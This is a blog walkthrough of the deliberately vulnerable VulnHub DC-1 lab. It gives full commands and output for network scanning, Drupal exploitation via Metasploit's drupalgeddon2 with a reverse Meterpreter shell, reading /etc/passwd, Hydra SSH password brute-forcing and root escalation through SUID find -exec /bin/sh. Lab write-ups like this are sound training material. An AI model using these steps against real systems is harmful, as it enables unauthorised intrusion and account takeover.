Description

DC-1: 1 vulnhub walkthrough is a purposely built vulnerable lab for the purpose of gaining experience. DC-1 machine design for beginners. It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn. you can download this machine form this link:- https://www.vulnhub.com/entry/dc-1-1,292/

Required Knowledge

  • familiarity with the Linux command line
  • Basic pen-testing tools
  • Built-in tools of kali Linux.

DC-1: 1 vulnhub walkthrough

After setting up DC-1: 1. We are going to start enumerate this machine so let’s find out the IP address of this machine

[email protected]:~# arp-scan -l

arp-scan -l command is used to check the connected system’s IP address in the same network. This command is also use to check MAC Address.

[email protected]:~# nmap -sV -p- 192.168.154.136

nmap is use for network auditing. Here we used two options with nmap then the targeted IP address.

  1. sV similarly for stealth version
  2. -p- is use for scanning all port from 0 to 65535.

nmap scanned successfully as a result we got four port. As we can see in above figure.

first of all open website which is running on port number 80 because the website contains lots of vulnerability. As a result we can see the site is running in drupal.

We found this site is running on drupal so I open metasploit to check the drupal vulnerability.

[email protected]:~# msfconsole 

msf5 > search drupal

Matching Modules
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
msf5 >

As a result we have some available vulnerability of drupal so let’s try with the latest one.

msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > show options
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.154.136
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
[*] Started reverse TCP handler on 192.168.154.132:4444
[*] Drupal 7 targeted at http://192.168.154.136/
[-] Could not determine Drupal patch level
[*] Sending stage (38247 bytes) to 192.168.154.136
[*] Meterpreter session 1 opened (192.168.154.132:4444 -> 192.168.154.136:35416) at 2019-03-09 16:52:47 -0500

meterpreter >

Yes here we got one open shell let’s check. if you do not have this option then update your operating system then similarly you can try.

meterpreter > shell
Process 5799 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/var/www
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:104::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash

In the above commands we have checked the user name & ID then present working directory. Now we are opening /etc/passwd file that contain the information about the user’s as a result we can see we a local user on the targeted server. So we can try to login with that user.

Here I am using hydra for brutforcing with the user name flag4 on targeted server.

[email protected]:~# hydra -l flag4 -P /usr/share/john/password.lst ssh://192.168.154.136 -I
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2019-03-09 17:08:41
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored …) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 3559 login tries (l:1/p:3559), ~223 tries per task
[DATA] attacking ssh://192.168.154.136:22/
[22][ssh] host: 192.168.154.136 login: flag4 password: orange
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2019-03-09 17:09:09
[email protected]:~#

hydra is very powerful tool for brute forcing attack there are lot’s of tools that similarly we can use for brute forcing.

[email protected]:~# ssh [email protected]
[email protected]'s password:
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Mar 9 10:13:45 2019 from 192.168.154.132
[email protected]:~$ id
uid=1001(flag4) gid=1001(flag4) groups=1001(flag4)

Privileges Escalation  of DC-1: 1 vulnhub walkthrough

[email protected]:~$ find / -type f -perm -u=s 2>/dev/null

In the above all section with the help of find command we can see /usr/bin/find command have the SUID permission.

[email protected]:~$ touch ankit
[email protected]:~$ find / -type f -name ankit -exec "whoami" \;
root
[email protected]:~$

Above all command will create a file the next command will search the file and also execute the next command which is” whoami”. -exec is use to execute any other command in the same command.

[email protected]:~$ find / -type f -name ankit -exec "/bin/sh" \;

As we can see in figure now we have root access. I hope you like this post & feel free to ask any question. Stay connect with cybrary india because knowledge matter & we are trying our best to provide you the solution of vulnhub walktrough. I hope you learn a lot of things in DC-1: 1 vulnhub walkthrough.


Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: